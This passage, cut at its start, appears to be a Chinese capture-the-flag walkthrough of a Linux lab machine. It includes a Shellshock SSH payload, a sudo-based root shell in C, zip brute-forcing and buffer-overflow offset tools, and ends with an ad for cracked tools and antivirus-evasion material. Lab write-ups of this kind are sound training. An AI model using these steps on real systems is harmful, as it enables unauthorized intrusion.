-l启动这个nginx查看默认的配置信息，监听的是8080端口查看端口信息curl用不了那么就用本机访问这里要用到一个工具，lynx，默认kali是没有的lynx：是一个文本模式的网页浏览器sudo apt-get install lynx此时我们就得到了一组数据genphlux:HF9nd0cR!，那么久查看一下是否有这个用户之前那个是nginx，现在是apache文件了查看默认开启的端口（apache的启动端口）查看是否启动成功80开启成功了，但是没有任何信息，只有一个403此时可以返回去看配置文件，有一个allow from 127.0.0.1查看是否存在curl和wget，来访问本地的服务（127.0.0.1）fido:x4tPl!，但是呢鉴权失败了回家的路上，看到了两个文件，一个ssh私匙这里搜集了半天，找到一个viminfo中有一个密码信息 B^slc8I$尝试sudosudo成功了，再看看权限，可以读写！还可以sudo写一个c文件init mAIn() { system('/bin/bash'); }这里出现一个编译错误，说我们使用了一个隐式的函数system，需要我们加上一个参数gcc -o dont_even_bother test.c -Wno-implicit-function-declaration总结level 1主要使用的是ftp匿名登录，和低版本操作系统的内核提权level 2 通过页面上的图片信息，使用strings查看图片信息，有一个信息泄露，得到zip密码信息后，使用fcrackzip对压缩包文件进行一个暴力破解，命令如下fcrackzip -D -p pass.txt -u lmao.zip然后就是Bashdoor（bash之门漏洞），命令如下ssh -i noob -o "PubkeyAcceptedKeyTypes=ssh-rsa" noob@192.168.111.191 -t "() { :;}; /bin/bash"最后就是缓冲区溢出漏洞，如何判断？看函数信息就可以了，需要一个调试工具gdb，还有msf的一个接口，常用命令gdb filename # 进入该文件的调试 disas main # 显示main函数的汇编代码 run # 运行当前文件，可简写 r # msf接口 /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1024 # 表示生成1024个字符 /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q [缓冲区溢出的位置，例如(0x6a413969)] -l 1024 # 反查这个溢出的位置的偏移量一个有用的python脚本，将 0xbffffb80 起始的esp地址转化为十六进制字节序列的形式address = 0xbffffb80 byte_sequence = address.to_bytes(4, byteorder='little') hex_representation = ''.join(f'\x{byte:02x}' for byte in byte_sequence) print(hex_representation) # x80xfbxffxbf一个有用的shellcode获取地https://shell-storm.org/shellcode/index.htmllevel 3 首先就是内网的信息收集，sudo开启nginx，然后使用lynx工具，获取网页信息，得到下一个用户的信息，第二个信息是apache的80端口，但是同样的方法，不会让你用第二次，切换到当前用户根目录，获取到ssh密匙文件，ssh登录即可，登录之后，信息收集需要完善，从viminfo找到密码信息，这个时候就能sudo了，利用可以sudo的文件权限信息，进行提权即可，感谢观看！广告时间如果你喜欢水报告，这里有1000多份的src报告，供你学习思路如果你想要一些源码，这里将有上百套的源码，供你魔改开发属于你自己的软件如果你需要ppt，那么这里几千份ppt模板，供你选择，搭配上GPT，轻松搞定你的每月汇总如果你想要做副业，那么这里有几百个网赚项目，让你利用流量变现，每个月可以多几条烟钱（我不抽烟），每年也可以小赚1w+如果你想要各种破解工具，辱羊毛，不想开会员，那么这里是你最好的选择，还有很多的实用小工具还有各种的学习资料，包括且不限于渗透测试，python/c++编程，免杀，AI人工智障，逆向，安全开发等互联网资源（如果进了帮会需要百度网盘还请联系我）如果你想要兼职，那么泷羽Sec提供了一个很好的兼职机会，您邀请一个人进入泷羽Sec帮会，凡是进入本帮会，嘉宾享72%的帮会推广收益，也就是【一次性付费金额0.72】，普通成员享受推广收益的40%也就是【一次性付费金额0.40】泷羽Sec资料库，现一次性付费99，即可永久进入，加入泷羽Sec帮会，享受各种IT资源，资源持续更新中感谢支持！往期推荐30款burp插件，一键搞定99%的渗透工具！HTB-Chemistry靶机渗透教程【渗透测试】Linux隐身登录【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏2024Goby红队版工具分享，附2024年漏洞POC下载